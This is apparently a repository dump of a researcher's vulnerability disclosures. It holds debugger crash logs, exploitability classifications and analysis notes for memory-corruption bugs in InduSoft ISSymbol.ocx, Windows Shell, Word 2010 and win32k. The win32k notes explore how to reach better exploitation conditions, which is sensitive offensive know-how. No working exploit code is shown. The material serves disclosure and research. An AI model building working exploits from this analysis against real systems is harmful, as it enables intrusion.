62eaaf74 89448ff8 mov dword ptr [edi+ecx*4-8],eax 24 | 62eaaf78 8b448efc mov eax,dword ptr [esi+ecx*4-4] 25 | 62eaaf7c 89448ffc mov dword ptr [edi+ecx*4-4],eax 26 | 62eaaf80 8d048d00000000 lea eax,[ecx*4] 27 | 62eaaf87 03f0 add esi,eax 28 | 62eaaf89 03f8 add edi,eax 29 | 62eaaf8b ff249594afea62 jmp dword ptr MSVCR90!memcpy+0x174 (62eaaf94)[edx*4] 30 | 62eaaf92 8bff mov edi,edi 31 | 62eaaf94 a4 movs byte ptr es:[edi],byte ptr [esi] 32 | 62eaaf95 af scas dword ptr es:[edi] 33 | 62eaaf96 ea62acafea62b8 jmp B862:EAAFAC62 34 | 62eaaf9d af scas dword ptr es:[edi] 35 | 62eaaf9e ea62ccafea628b jmp 8B62:EAAFCC62 36 | 62eaafa5 45 inc ebp 37 | 62eaafa6 085e5f or byte ptr [esi+5Fh],bl 38 | 62eaafa9 c9 leave 39 | 62eaafaa c3 ret 40 | 62eaafab 90 nop 41 | 62eaafac 8a06 mov al,byte ptr [esi] 42 | 62eaafae 8807 mov byte ptr [edi],al 43 | 62eaafb0 8b4508 mov eax,dword ptr [ebp+8] 44 | 62eaafb3 5e pop esi 45 | 62eaafb4 5f pop edi 46 | 62eaafb5 c9 leave 47 | 62eaafb6 c3 ret 48 | 62eaafb7 90 nop 49 | 62eaafb8 8a06 mov al,byte ptr [esi] 50 | 62eaafba 8807 mov byte ptr [edi],al 51 | 62eaafbc 8a4601 mov al,byte ptr [esi+1] 52 | 62eaafbf 884701 mov byte ptr [edi+1],al 53 | 62eaafc2 8b4508 mov eax,dword ptr [ebp+8] 54 | 62eaafc5 5e pop esi 55 | 62eaafc6 5f pop edi 56 | 62eaafc7 c9 leave 57 | 62eaafc8 c3 ret 58 | 62eaafc9 8d4900 lea ecx,[ecx] 59 | 62eaafcc 8a06 mov al,byte ptr [esi] 60 | 62eaafce 8807 mov byte ptr [edi],al 61 | 0:000> !analyze -v 62 | ******************************************************************************* 63 | * * 64 | * Exception Analysis * 65 | * * 66 | ******************************************************************************* 67 | 68 | *** ERROR: Module load completed but symbols could not be loaded for Viewer.exe 69 | *** WARNING: Unable to verify checksum for C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ede2c6c842840e009f01bcc74fa4c457\mscorlib.ni.dll 70 | !pe 71 | There is no current managed exception on this thread 72 | GetUrlPageData2 (WinHttp) failed: 12007. 73 | 74 | FAULTING_IP: 75 | MSVCR90!memcpy+15c 76 | 62eaaf7c 89448ffc mov dword ptr [edi+ecx*4-4],eax 77 | 78 | EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) 79 | .exr 0xffffffffffffffff 80 | ExceptionAddress: 62eaaf7c (MSVCR90!memcpy+0x0000015c) 81 | ExceptionCode: c0000005 (Access violation) 82 | ExceptionFlags: 00000000 83 | NumberParameters: 2 84 | Parameter[0]: 00000001 85 | Parameter[1]: 0a321000 86 | Attempt to write to address 0a321000 87 | 88 | FAULTING_THREAD: 00000b98 89 | 90 | DEFAULT_BUCKET_ID: WRONG_SYMBOLS 91 | 92 | PROCESS_NAME: Viewer.exe 93 | 94 | ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. 95 | 96 | EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. 97 | 98 | EXCEPTION_PARAMETER1: 00000001 99 | 100 | EXCEPTION_PARAMETER2: 0a321000 101 | 102 | WRITE_ADDRESS: 0a321000 103 | 104 | FOLLOWUP_IP: 105 | MSVCR90!memcpy+15c 106 | 62eaaf7c 89448ffc mov dword ptr [edi+ecx*4-4],eax 107 | 108 | NTGLOBALFLAG: 0 109 | 110 | APPLICATION_VERIFIER_FLAGS: 0 111 | 112 | APP: viewer.exe 113 | 114 | MANAGED_STACK: !dumpstack -EE 115 | !dumpstack -EE 116 | OS Thread Id: 0xb98 (0) 117 | Current frame: 118 | ChildEBP RetAddr Caller,Callee 119 | 120 | PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS 121 | 122 | BUGCHECK_STR: APPLICATION_FAULT_WRONG_SYMBOLS 123 | 124 | LAST_CONTROL_TRANSFER: from 62ea69ed to 62eaaf7c 125 | 126 | STACK_TEXT: 127 | 0012a61c 62ea69ed 0a320ff4 0a3020ed 00000010 MSVCR90!memcpy+0x15c 128 | 0012a638 62553470 0a320ff4 00000010 0a3020ed MSVCR90!memcpy_s+0x4a 129 | 0012a650 62552e5b 0a320ff4 00000010 0a3020ed mfc90u!ATL::Checked::memcpy_s+0x17 130 | 0012a67c 101f21e3 0a320ff4 00000010 667c62ee mfc90u!CArchive::Read+0x49 131 | WARNING: Stack unwind information not available. Following frames may be wrong. 132 | 0012a758 1021e8f0 0012bad0 667c6dae 66fc95d4 ISSymbol!DllUnregisterServer+0x1e8383 133 | 0012a818 1025dae0 0012bad0 0a3053b8 0a31c26c ISSymbol!DllUnregisterServer+0x214a90 134 | 0012a83c 10263d75 0012bad0 667c7fa2 001ed570 ISSymbol!DllUnregisterServer+0x253c80 135 | 0012ba14 10260d88 0012bad0 667c7e9a 00000008 ISSymbol!DllUnregisterServer+0x259f15 136 | 0012bb2c 10261cf9 0012bf14 667c06e6 0012ba74 ISSymbol!DllUnregisterServer+0x256f28 137 | 0012c350 1028a0fa 0012d10c 667c0616 00000008 ISSymbol!DllUnregisterServer+0x257e99 138 | 0012c3a0 10031f70 0012d10c 00000001 667c17e2 ISSymbol!DllUnregisterServer+0x28029a 139 | 0012d254 10025fdd 0a207ae0 00000000 10392134 ISSymbol!DllUnregisterServer+0x28110 140 | 0012d2ec 1002ff68 0a25d728 80000000 80000000 ISSymbol!DllUnregisterServer+0x1c17d 141 | 0012d9d8 10022136 0a2076a0 667c35b6 00000000 ISSymbol!DllUnregisterServer+0x26108 142 | 0012f000 1001bfd2 667c317e 00003bf8 0012f04c ISSymbol!DllUnregisterServer+0x182d6 143 | 0012f4c8 1003f68d 00000000 667c3c9a 0012f4ec ISSymbol!DllUnregisterServer+0x12172 144 | 0012f92c 625d2927 001c0ed4 625bfd23 049dda62 ISSymbol!DllUnregisterServer+0x3582d 145 | 0012f9dc 625c03f0 10395008 00000001 00000000 mfc90u!_AfxDispatchCall+0x10 146 | 0012fa80 625c11d6 00000001 00000060 62505f88 mfc90u!COleDispatchImpl::Invoke+0x388 147 | 0012fb54 625dee36 00000060 00000001 00000000 mfc90u!COleDispatchDriver::InvokeHelperV+0x324 148 | 0012fb7c 6258c7d6 00000060 00000001 00000000 mfc90u!COleControlSite::InvokeHelperV+0x57 149 | 0012fb9c 004021f1 0039c0c8 00000060 00000001 mfc90u!CWnd::InvokeHelper+0x27 150 | 0012fbc4 0040d047 012420b8 0039c000 0039bf00 Viewer+0x21f1 151 | 0012fbdc 0040d0f4 0039bf00 0012fc90 6255fafa Viewer+0xd047 152 | 0012fbe8 6255fafa 00000064 66fc37fa 00000113 Viewer+0xd0f4 153 | 0012fc90 6255f6cc 00000113 00000064 00000000 mfc90u!CWnd::OnWndMsg+0x407 154 | 0012fcb0 0040a36c 00000113 00000064 00000000 mfc90u!CWnd::WindowProc+0x24 155 | 0012fcc8 6255e2f2 00000113 00000064 00000000 Viewer+0xa36c 156 | 0012fd30 6255e57e 00000000 001005f4 00000113 mfc90u!AfxCallWndProc+0xa3 157 | 0012fd54 6255c234 001005f4 00000113 00000064 mfc90u!AfxWndProc+0x37 158 | 0012fd9c 76f7c4e7 001005f4 00000113 00000064 mfc90u!AfxWndProcBase+0x56 159 | 0012fdc8 76f7c5e7 6255c1de 001005f4 00000113 USER32!InternalCallWinProc+0x23 160 | 0012fe40 76f7cc19 001a910c 6255c1de 001005f4 USER32!UserCallWinProcCheckWow+0x14b 161 | 0012fea0 76f7cc70 6255c1de 00000000 0012fee0 USER32!DispatchMessageWorker+0x35e 162 | 0012feb0 6259e491 001a51c8 00000000 0041c6d0 USER32!DispatchMessageW+0xf 163 | 0012fec0 6259eb18 0041c6d0 0041c6d0 ffffffff mfc90u!AfxInternalPumpMessage+0x40 164 | 0012fee0 6256af81 0041c818 00000001 00000000 mfc90u!CWinThread::Run+0x5b 165 | 0012fef4 0040507f 00400000 00000000 00191e7e mfc90u!AfxWinMain+0x6a 166 | 0012ff88 757fee1c 7ffdd000 0012ffd4 770937eb Viewer+0x507f 167 | 0012ff94 770937eb 7ffdd000 78f1c642 00000000 kernel32!BaseThreadInitThunk+0xe 168 | 0012ffd4 770937be 004051ee 7ffdd000 00000000 ntdll!__RtlUserThreadStart+0x70 169 | 0012ffec 00000000 004051ee 7ffdd000 00000000 ntdll!_RtlUserThreadStart+0x1b 170 | 171 | 172 | SYMBOL_STACK_INDEX: 0 173 | 174 | SYMBOL_NAME: msvcr90!memcpy+15c 175 | 176 | FOLLOWUP_NAME: MachineOwner 177 | 178 | MODULE_NAME: MSVCR90 179 | 180 | IMAGE_NAME: MSVCR90.dll 181 | 182 | DEBUG_FLR_IMAGE_TIMESTAMP: 4dace5b9 183 | 184 | STACK_COMMAND: ~0s ; kb 185 | 186 | FAILURE_BUCKET_ID: WRONG_SYMBOLS_c0000005_MSVCR90.dll!memcpy 187 | 188 | BUCKET_ID: APPLICATION_FAULT_WRONG_SYMBOLS_msvcr90!memcpy+15c 189 | 190 | WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/Viewer_exe/1201_1404_202_0/533cc8c5/MSVCR90_dll/9_0_30729_6161/4dace5b9/c0000005/0003af7c.htm?Retriage=1 191 | 192 | Followup: MachineOwner 193 | --------- 194 | 195 | 0:000> !load msec 196 | 0:000> !exploitable -v 197 | 198 | !exploitable 1.6.0.0 199 | HostMachine\HostUser 200 | Executing Processor Architecture is x86 201 | Debuggee is in User Mode 202 | Debuggee is a live user mode debugging session on the local machine 203 | Event Type: Exception 204 | Exception Faulting Address: 0xa321000 205 | First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) 206 | Exception Sub-Type: Write Access Violation 207 | 208 | Faulting Instruction:62eaaf7c mov dword ptr [edi+ecx*4-4],eax 209 | 210 | Exception Hash (Major/Minor): 0x05af6d57.0x6cfc84d3 211 | 212 | Hash Usage : Stack Trace: 213 | Major+Minor : MSVCR90!memcpy+0x15c 214 | Major+Minor : MSVCR90!memcpy_s+0x4a 215 | Major+Minor : mfc90u!ATL::Checked::memcpy_s+0x17 216 | Major+Minor : mfc90u!CArchive::Read+0x49 217 | Major+Minor : ISSymbol!DllUnregisterServer+0x1e8383 218 | Minor : ISSymbol!DllUnregisterServer+0x214a90 219 | Minor : ISSymbol!DllUnregisterServer+0x253c80 220 | Minor : ISSymbol!DllUnregisterServer+0x259f15 221 | Minor : ISSymbol!DllUnregisterServer+0x256f28 222 | Minor : ISSymbol!DllUnregisterServer+0x257e99 223 | Minor : ISSymbol!DllUnregisterServer+0x28029a 224 | Minor : ISSymbol!DllUnregisterServer+0x28110 225 | Minor : ISSymbol!DllUnregisterServer+0x1c17d 226 | Minor : ISSymbol!DllUnregisterServer+0x26108 227 | Minor : ISSymbol!DllUnregisterServer+0x182d6 228 | Minor : ISSymbol!DllUnregisterServer+0x12172 229 | Minor : ISSymbol!DllUnregisterServer+0x3582d 230 | Minor : mfc90u!_AfxDispatchCall+0x10 231 | Minor : mfc90u!COleDispatchImpl::Invoke+0x388 232 | Minor : mfc90u!COleDispatchDriver::InvokeHelperV+0x324 233 | Minor : mfc90u!COleControlSite::InvokeHelperV+0x57 234 | Minor : mfc90u!CWnd::InvokeHelper+0x27 235 | Minor : Viewer+0x21f1 236 | Minor : Viewer+0xd047 237 | Minor : Viewer+0xd0f4 238 | Minor : mfc90u!CWnd::OnWndMsg+0x407 239 | Minor : mfc90u!CWnd::WindowProc+0x24 240 | Minor : Viewer+0xa36c 241 | Minor : mfc90u!AfxCallWndProc+0xa3 242 | Minor : mfc90u!AfxWndProc+0x37 243 | Minor : mfc90u!AfxWndProcBase+0x56 244 | Minor : USER32!InternalCallWinProc+0x23 245 | Minor : USER32!UserCallWinProcCheckWow+0x14b 246 | Minor : USER32!DispatchMessageWorker+0x35e 247 | Minor : USER32!DispatchMessageW+0xf 248 | Minor : mfc90u!AfxInternalPumpMessage+0x40 249 | Minor : mfc90u!CWinThread::Run+0x5b 250 | Minor : mfc90u!AfxWinMain+0x6a 251 | Minor : Viewer+0x507f 252 | Minor : kernel32!BaseThreadInitThunk+0xe 253 | Minor : ntdll!__RtlUserThreadStart+0x70 254 | Minor : ntdll!_RtlUserThreadStart+0x1b 255 | Instruction Address: 0x0000000062eaaf7c 256 | 257 | Description: User Mode Write AV 258 | Short Description: WriteAV 259 | Exploitability Classification: EXPLOITABLE 260 | Recommended Bug Title: Exploitable - User Mode Write AV starting at MSVCR90!memcpy+0x000000000000015c (Hash=0x05af6d57.0x6cfc84d3) 261 | 262 | User mode write access violations that are not near NULL are exploitable. 263 | 0:000> .logclose 264 | Closing open log file y:\crash2.log 265 | -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/issymbol.ocx Heap Corruption +0x0000000000000268 EXPLOITABLE/testcase: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2014-XXXX_InduSoft_SchneiderElectric/issymbol.ocx Heap Corruption +0x0000000000000268 EXPLOITABLE/testcase -------------------------------------------------------------------------------- /CVE-2015-2515_Windows_Shell/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2015-2515: Windows Shell Use-after-free Remote Code Execution Vulnerability 4 | 5 | Found by fuzzing. Reported by another researcher due to a bug collision. Reachable via Internet Explorer's COM embedding, and (probably) Microsoft Office document containers 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: Alisa Esage (independently), unidentified researcher 10 | Vulnerability analysis: Alisa Esage 11 | Proof of concept: Alisa Esage 12 | -------------------------------------------------------------------------------- /CVE-2015-2515_Windows_Shell/bin/patched/ExplorerFrame.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2015-2515_Windows_Shell/bin/patched/ExplorerFrame.dll -------------------------------------------------------------------------------- /CVE-2015-2515_Windows_Shell/bin/patched/shell32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2015-2515_Windows_Shell/bin/patched/shell32.dll -------------------------------------------------------------------------------- /CVE-2015-2515_Windows_Shell/bin/vulnerable/ExplorerFrame.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2015-2515_Windows_Shell/bin/vulnerable/ExplorerFrame.dll -------------------------------------------------------------------------------- /CVE-2015-2515_Windows_Shell/bin/vulnerable/shell32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2015-2515_Windows_Shell/bin/vulnerable/shell32.dll -------------------------------------------------------------------------------- /CVE-2015-2515_Windows_Shell/screens/control.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2015-2515_Windows_Shell/screens/control.png -------------------------------------------------------------------------------- /CVE-2015-2515_Windows_Shell/test/testcase_1.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 12 | 13 | clickme 14 | 15 | 16 | -------------------------------------------------------------------------------- /CVE-2015-2515_Windows_Shell/test/testcase_2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 12 | 13 | clickme 14 | 15 | 16 | -------------------------------------------------------------------------------- /CVE-2015-XXXX_MSOffice_Word/MSWord 2010 MSPTLS_LssbFIsSublineEmpty DEPViolation/analysis.txt: -------------------------------------------------------------------------------- 1 | Target: Microsoft Office Word 2010 2 | Module: msptls.dll 3 | Trigger: docx 4 | MSEC: PROBABLY_EXPLOITABLE 5 | 6 | Crash context 7 | 8 | (e44.bf0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL - eax=02325000 ebx=0000000d ecx=00000a10 edx=001a55d4 esi=04e7c480 edi=04e7ff00 eip=00000000 esp=001a55a0 ebp=001a5600 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 00000000 ?? ??? 9 | 10 | 0:000> kb ChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong. 001a559c 69702e68 04ee6540 001a55d4 001a5660 0x0 001a5600 69714651 0232600c 001a5678 00000001 MSPTLS!LssbFIsSublineEmpty+0x3345 001a5630 69715574 02326008 001a5678 001a5704 MSPTLS!LssbFIsSublineEmpty+0x14b2e 001a56ac 697156ad 04e7c4e0 001a5704 001a597c MSPTLS!LssbFIsSublineEmpty+0x15a51 001a56d4 6970f23a 02326008 001a5850 04e7c4e0 MSPTLS!LssbFIsSublineEmpty+0x15b8a 001a58e0 696f4c98 02325000 00000000 00000ccd MSPTLS!LssbFIsSublineEmpty+0xf717 …… 11 | 12 | 0:000> !exploitable !exploitable 1.6.0.0 Exploitability Classification: PROBABLY_EXPLOITABLE Recommended Bug Title: Probably Exploitable - Read Access Violation Near Null at the Instruction Pointer starting at Unknown Symbol @ 0x0000000000000000 called from MSPTLS!LssbFIsSublineEmpty+0x0000000000003345 (Hash=0xbe34e37c.0xe113e931) Access violations at the instruction pointer are probably exploitable if near NULL. 13 | 14 | Analysis 15 | 16 | The fail is due to miscalculated call in msptls.dll: 17 | 18 | .text:6BDD2E32 loc_6BDD2E32: ; CODE XREF: sub_6BDD2BCA+21Dj .text:6BDD2E32 mov edx, [eax+0Ch] .text:6BDD2E35 imul ecx, 0B8h ; ecx=offset .text:6BDD2E3B mov [ebp+var_2C], edx .text:6BDD2E3E mov edx, [eax+1Ch] .text:6BDD2E41 mov [ebp+var_28], edx .text:6BDD2E44 lea edx, [eax+3Ch] .text:6BDD2E47 mov [ebp+var_24], edx .text:6BDD2E4A mov edx, [eax+4Ch] .text:6BDD2E4D mov [ebp+var_20], edx .text:6BDD2E50 lea edx, [ebp+var_4] .text:6BDD2E53 push edx .text:6BDD2E54 push [ebp+arg_10] .text:6BDD2E57 lea edx, [ebp+var_2C] .text:6BDD2E5A push edx .text:6BDD2E5B push dword ptr [eax+70h] .text:6BDD2E5E mov eax, [ebp+base] ; eax=base --> .text:6BDD2E61 call dword ptr [ecx+eax+234h] ; fail (mso0002) .text:6BDD2E68 jmp short loc_6BDD2DF7 19 | 20 | In the above code, eax points to the memory base and ecx is the counter: 21 | 22 | eax=02325000 23 | ecx=00000a10 24 | 25 | 0:000> !address eax Usage: Base Address: 02320000 End Address: 02330000 Region Size: 00010000 State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE Type: 00020000 MEM_PRIVATE Allocation Base: 02320000 Allocation Protect: 00000004 PAGE_READWRITE 26 | 27 | The referenced memory at [ecx+eax+234h] contains zeroes but seems valid otherwise: 28 | 29 | 0:000> db ecx+eax+234-10 02325c34 00 00 00 00 00 00 00 00-b1 c7 71 69 b1 c7 71 69 ..........qi..qi 02325c44 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 30 | 31 | ecx is derived from [edi+8]: 32 | 33 | .text:6BDD2DA0 loc_6BDD2DA0: ; CODE XREF: v_mso0002+1C9j .text:6BDD2DA9 mov ecx, [edi+8] … 34 | .text:6BDD2DB0 movzx ebx, word ptr [ecx] … 35 | .text:6BDD2DD7 movzx ecx, bx 36 | 37 | 0:000> db poi(edi+8) 02282444 0e 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 02282454 00 98 f2 04 7c a2 3e 00-28 49 3a 00 7c a2 3e 00 ....|.>.(I:.|.>. 02282464 7c a2 3e 00 28 49 3a 00-7c a2 3e 00 00 ee 1f 04 |.>.(I:.|.>..... 02282474 00 ee 1f 04 40 65 ee 04-f4 24 28 02 4c 53 44 4e ....@e...$(.LSDN 02282484 00 00 00 00 00 00 00 00-01 00 00 80 03 00 00 80 ................ 02282494 90 06 e7 04 00 00 00 00-02 00 00 00 01 00 00 80 ................ 022824a4 02 00 00 00 01 00 00 80-00 00 00 00 00 00 00 00 ................ 022824b4 00 00 00 00 00 00 00 00-0d 00 00 00 04 00 00 00 ................ 0:000> ? 0e*b8 Evaluate expression: 2576 = 00000a10 0:000> ? ecx Evaluate expression: 2576 = 00000a10 38 | 39 | Where is the "0xe" in ecx from: 40 | 41 | bp MSPTLS!LssbFIsSublineEmpty+0x14b18 42 | 0:000> db poi(poi(ebp+c)+4)-3c 022d04bc 0d 00 00 00 04 00 00 00-00 00 18 00 00 00 00 00 ................ 022d04cc 00 e0 f2 03 7c a2 3e 00-28 49 3a 00 a4 eb 78 00 ....|.>.(I:...x. 022d04dc 7c a2 3e 00 28 49 3a 00-a4 eb 78 00 00 ee 1f 04 |.>.(I:...x..... 022d04ec 00 ee 1f 04 08 a0 60 02-6c 05 2d 02 4c 53 44 4e ......`.l.-.LSDN 022d04fc 00 00 00 00 08 04 2d 02-04 00 00 80 05 00 00 80 ......-......... 022d050c 0c 70 60 02 01 00 00 00-01 00 00 00 04 00 00 80 .p`............. 022d051c 01 00 00 00 93 00 00 00-00 00 00 00 00 00 00 00 ................ 022d052c 40 10 60 02 00 00 00 00-0d 00 00 00 04 00 00 00 @.`............. 0:000> ba w4 022d04bc 43 | 44 | 45 | 0:000> !heap -p -a poi(edi+8) address 057a2c7c found in _DPH_HEAP_ROOT @ 11f1000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 530223c: 57a2c38 3c4 - 57a2000 2000 71088e89 verifier!VerifierDisableFaultInjectionExclusionRange+0x00002f39 775d5ede ntdll!RtlDebugAllocateHeap+0x00000030 7759a40a ntdll!RtlpAllocateHeap+0x000000c4 77565ae0 ntdll!RtlAllocateHeap+0x0000023a 687c410c mso!Ordinal149+0x00007480 6a06fc5a MSPTLS!LssbFIsSublineEmpty+0x00000137 6a06fd10 MSPTLS!LssbFIsSublineEmpty+0x000001ed 6a06fe8d MSPTLS!LssbFIsSublineEmpty+0x0000036a 6a07ece6 MSPTLS!LssbFIsSublineEmpty+0x0000f1c3 6a0649cb MSPTLS!LsCreateContext+0x0000015f 66869224 wwlib!DllGetClassObject+0x00003bc8 66868d2f wwlib!DllGetClassObject+0x000036d3 668683a4 wwlib!DllGetClassObject+0x00002d48 6686808c wwlib!DllGetClassObject+0x00002a30 668653bb wwlib!FMain+0x0000023e 2f251c68 winword!wdGetApplicationObject+0x0000063a 2f251ec2 winword!wdGetApplicationObject+0x00000894 76a2ee1c kernel32!BaseThreadInitThunk+0x0000000e 775737eb ntdll!__RtlUserThreadStart+0x00000070 775737be ntdll!_RtlUserThreadStart+0x0000001b 0:000> u mso!Ordinal149+0x00007480-6 mso!Ordinal149+0x747a: 687c4106 ff15a416bb67 call dword ptr [mso!Ordinal10695+0x16a4 (67bb16a4)] 687c410c c20400 ret 4 687c410f 8b442408 mov eax,dword ptr [esp+8] 687c4113 8b542404 mov edx,dword ptr [esp+4] 687c4117 50 push eax 687c4118 8b410c mov eax,dword ptr [ecx+0Ch] 687c411b 52 push edx -------------------------------------------------------------------------------- /CVE-2015-XXXX_MSOffice_Word/MSWord 2010 MSPTLS_LssbFIsSublineEmpty DEPViolation/testcase.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2015-XXXX_MSOffice_Word/MSWord 2010 MSPTLS_LssbFIsSublineEmpty DEPViolation/testcase.docx -------------------------------------------------------------------------------- /CVE-2015-XXXX_MSOffice_Word/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2014-XXXX: Microsoft Office Word 2010 Memory Corruption Vulnerability 4 | 5 | Found by fuzzing. Reported via the Zero Day Initiative. Disclosed by them as an 0-day 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: Alisa Esage 10 | Vulnerability analysis: Alisa Esage 11 | Proof of concept: Alisa Esage 12 | -------------------------------------------------------------------------------- /CVE-2016-0143_win32k/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2016-0143: Microsoft Win32k Elevation of Privilege Vulnerability 4 | 5 | ### Credits 6 | 7 | Vulnerability discovery: Nils Sommer 8 | Vulnerability analysis: Alisa Esage 9 | -------------------------------------------------------------------------------- /CVE-2016-0143_win32k/notes.txt: -------------------------------------------------------------------------------- 1 | -?- Is it possible to trigger the bug via a different path to get better exploitation conditions? 2 | 3 | If we look at the vulnerable xxxRealDrawMenuItem() call chain, it starts forking backwards at the call to xxxDrawMenuItem(), that may be called from: 4 | * xxxHotTrackMenu() 5 | ^-- this goes up to tracking mouse moves, processing of system messages (xxxScanSysQUeue()), and finally lands at the exported function NtUserRealInternalGetMessage(); another path sets at NtUserSetFocus(); there are possibly other Nt* landings 6 | * xxxMNInvertItem() 7 | ^-- this goes up through menu items manipulation, key tracking, and lands at xxxWrapRealDefWindowProc() 8 | * xxxMenuDraw() <-- this is the original poc's path 9 | 10 | 11 | -?- Understand the situation of debugger code altering the stack. In what exactly conditions is the stack altered? What is the written value and why? How can I manipulate the value written on the stack? 12 | 13 | What we know at this point: 14 | 1. Before the vulnerable function, xxxRealDrawMenuItem(), is called from xxxDrawState(): 15 | GreSetLayout() is called a few times, with HmgLockEx() call inside, which sets the vulnerable stack slot to HmgLockEx() return address. 16 | 2. In case that a kernel bp was set on xxxRealDrawMenuItem() (possibly in other cases as well): 17 | nt!KiDebugTrapOrFault() is called before executing the xxxRealDrawMenuItem(), that calls KxContextToKFrames(), that nulls the vulnerable stack slot (or possibly writes another value to it). 18 | 3. Finally, xxxRealDrawMenuItem() is called and goes to crash (or possibly loops in KiDebugTrapOrFault() in some cases). 19 | 20 | So basically, when a bp is put on a function, upon entrance into that function, nt!KiDebugTrapOrFault() is called. 21 | Because of this it is possible to generate a recursion on kernel stack by putting a bp on a debugger's function (eg. nt!KxContextToKeFrames()). 22 | 23 | Let's ba w on the vulnerable stack slot to see who and when alters it. 24 | Vulnerable stack slot relative to xxxDrawMenuItem's return address: 25 | 26 | 0: kd> k 27 | # Child-SP RetAddr Call Site 28 | 00 fffff880`15b905f8 fffff960`0023c55b win32k!xxxRealDrawMenuItem 29 | 01 fffff880`15b90600 fffff960`001f6dd6 win32k!xxxDrawState+0x5e7 30 | 02 fffff880`15b90770 fffff960`001f847e win32k!xxxDrawMenuItem+0x516 31 | 03 fffff880`15b90830 fffff960`001f8db6 win32k!xxxMenuDraw+0x346 32 | 04 fffff880`15b90900 fffff960`001a55cb win32k!xxxDrawMenuBarTemp+0x2aa 33 | 05 fffff880`15b909e0 fffff800`016d4613 win32k!NtUserDrawMenuBarTemp+0xe7 34 | 06 fffff880`15b90a70 00000000`776bae6a nt!KiSystemServiceCopyEnd+0x13 35 | 07 00000000`001bfdf8 00000000`777007c7 0x776bae6a 36 | 08 00000000`001bfe00 00000000`00010193 0x777007c7 37 | 09 00000000`001bfe08 00000000`00000000 0x10193 38 | 39 | 0: kd> dqs fffff880`15b90770-278 l1 40 | fffff880`15b904f8 00000000`00000000 41 | 42 | Crashing offsets: 43 | fffff880`1484b460 fffff960`0020c55b : 00000000`07010725 00000000`00000000 00000000`00000000 fffff960`00157771 : win32k!xxxRealDrawMenuItem+0x6ea 44 | fffff880`1484b600 fffff960`001c6dd6 : 00000000`00000001 00000000`0110007c fffff880`1484b7d0 fffff900`c0815e80 : win32k!xxxDrawState+0x5e7 45 | 46 | Got a loop: 47 | 48 | 1: kd> g 49 | Breakpoint 1 hit 50 | nt!KiDebugTrapOrFault+0xb7: 51 | fffff800`016c62b7 0f295510 movaps xmmword ptr [rbp+10h],xmm2 52 | 1: kd> g 53 | Single step exception - code 80000004 (first chance) 54 | First chance exceptions are reported before any exception handling. 55 | This exception may be expected and handled. 56 | win32k!xxxDrawState+0x5da: 57 | fffff960`0022c54e c744242001000000 mov dword ptr [rsp+20h],1 58 | 1: kd> g 59 | Breakpoint 1 hit 60 | nt!KxContextToKframes+0x1ce: 61 | fffff800`016f148e 488b83c0010000 mov rax,qword ptr [rbx+1C0h] 62 | 1: kd> g 63 | Breakpoint 1 hit 64 | nt!KiDebugTrapOrFault+0xb7: 65 | fffff800`016c62b7 0f295510 movaps xmmword ptr [rbp+10h],xmm2 66 | 1: kd> k 67 | # Child-SP RetAddr Call Site 68 | 00 fffff880`15bae470 fffff960`0022c54e nt!KiDebugTrapOrFault+0xb7 69 | 01 fffff880`15bae600 fffff960`001e6dd6 win32k!xxxDrawState+0x5da 70 | 02 fffff880`15bae770 fffff960`001e847e win32k!xxxDrawMenuItem+0x516 71 | 03 fffff880`15bae830 fffff960`001e8db6 win32k!xxxMenuDraw+0x346 72 | 04 fffff880`15bae900 fffff960`001955cb win32k!xxxDrawMenuBarTemp+0x2aa 73 | 05 fffff880`15bae9e0 fffff800`016c8613 win32k!NtUserDrawMenuBarTemp+0xe7 74 | 06 fffff880`15baea70 00000000`76e2ae6a nt!KiSystemServiceCopyEnd+0x13 75 | 07 00000000`0020fa18 00000000`76e707c7 